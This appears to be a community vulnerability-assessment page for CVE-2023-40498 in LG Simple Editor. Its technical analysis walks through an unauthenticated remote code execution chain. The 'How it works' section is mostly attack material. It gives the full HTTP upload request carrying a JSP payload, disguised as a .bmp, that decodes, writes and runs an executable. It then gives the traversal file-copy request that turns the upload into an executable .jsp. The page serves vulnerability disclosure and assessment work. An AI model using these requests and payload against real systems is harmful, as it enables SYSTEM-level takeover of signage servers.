Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
2

CVE-2023-40498

Last updated August 14, 2023
CVE-2023-40498
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

Add Assessment

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Easy to weaponizeGives privileged accessUnauthenticatedVulnerable in default configuration
Technical Analysis

LG Simple Editor is a solution that enables you to create and distribute content easily and quickly by using templates. LG Simple Editor is recommended for small businesses and sports bars which require simple content display or play-on-air via their signage. It enables easy new content creation by simplifying processes, and immediate playback on signage. Version prior to v3.21 suffer from two vulnerability specifically a broken access control and directory traversal that result in remote code execution in the context of NT AUTHORITY \SYSTEM

Vulnerable Versions

  • <= v3.21

Attacker Value & Exploitability

This exploit scores 5/5 in both categories primarily due to the fact the exploit provides unauthenticated remote code execution in the context of NT AUTHORITY \SYSTEM. Other contributing factors are of course how it is vulnerable straight out of the box and how easy it is to exploit. It might not be as common in enterprise by nature of the product description above however I don’t think that should affect either of these ratings.

How it works

First start by exploiting the broken access control vulnerability (which at the time of writing does not have a CVE – it could be considered a feature). The endpoint /simpleeditor/imageManager/uploadImage.do will allow you to upload a file with the .bmp file extension of which the contents are not inspected thoroughly. In order to obtain remote code execution we can upload a malicious .jsp under the disguise of a .bmp file extension. The following .jsp payload (used by the metasploit module windows/http/lg_simple_editor_rce) first base64 decodes the raw bytes of a malicious executable, then writes the executable to a file, then runs the executable with Runtime.getRuntime().exe.

POST /simpleeditor/imageManager/uploadImage.do HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: multipart/form-data; boundary=---------------------------761960311879735919883545313592
Content-Length: 99894

-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadFile"; filename="SyouN.bmp"
Content-Type: image/bmp
Content-Transfer-Encoding: binary

    <%@page import="java.io.*" %>    <%@page import="sun.misc.BASE64Decoder"%>    <%    try {      String cXaet = "

    <<binary payload base64 encoded>> 

    ";      BASE64Decoder dHhlo = new BASE64Decoder();      byte[] aHZZzH = dHhlo.decodeBuffer(cXaet.toString());      File eplNCoYo = File.createTempFile("OXvZEnQ", ".exe");      String fbhUvbGUQZA = eplNCoYo.getAbsolutePath();      BufferedOutputStream bghnAwAsukY =        new BufferedOutputStream(new FileOutputStream(fbhUvbGUQZA));      bghnAwAsukY.write(aHZZzH);      bghnAwAsukY.close();      Process eVsTEolPjY = Runtime.getRuntime().exec(fbhUvbGUQZA);    } catch (Exception e) {    }    %>
-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadPath"

/
-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadFile_x"

-1000
-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadFile_y"

-1000
-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadFile_width"

1920
-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadFile_height"

1080
-----------------------------761960311879735919883545313592--

Now we can exploit the vulnerability that is tied to CVE-2023-40498. The /simpleeditor/fileSystem/makeDetailContent.do endpoint allows unauthenticated users to copy files on the filesystem with no directory traversal mitigations in place. So we can copy our malicious .bmp file to a file with the extension .jsp so we can execute it (ezpz some might say). This can be achieved by issuing the following POST request:

POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
X-Requested-With: XMLHttpRequest
Accept: application/json
Content-Type: application/json
Content-Length: 86

{"command":"cp","option":"-f","srcPath":"/SyouN_original.bmp","destPath":"/SyouN.jsp"}

The payload we uploaded is now in an executable file format in a directory accessible without authentication.

Log in to Add Reply

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
Unknown
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis